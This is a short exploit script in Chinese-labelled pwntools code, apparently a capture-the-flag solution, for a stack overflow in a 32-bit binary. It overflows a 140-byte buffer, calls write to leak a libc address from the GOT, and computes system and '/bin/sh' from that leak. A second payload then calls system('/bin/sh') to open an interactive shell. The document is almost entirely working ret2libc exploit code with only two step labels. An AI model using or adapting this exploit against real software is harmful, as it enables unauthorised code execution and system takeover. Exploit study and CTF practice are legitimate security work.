漏洞:栈溢出
exp:
1、用write泄露libc
2、system("/bin/sh")
# write(1,got_write,4) back to 0x08048460
payload = 140*"a"+p32(elf.plt["write"])+p32(0x08048460)
payload += p32(1) + p32(elf.got["write"]) + p32(4)
p.sendline(payload)
write_addr = u32(p.recv(4))
system_addr = write_addr-(libc.symbols['write']-libc.symbols['system'])
binsh = write_addr-(libc.symbols['write']-next(libc.search('/bin/sh')))
# system("/bin/sh")
payload2 = 140*"a" + p32(system_addr)+p32(0x08048460)+p32(binsh)
p.sendline(payload2)
p.interactive()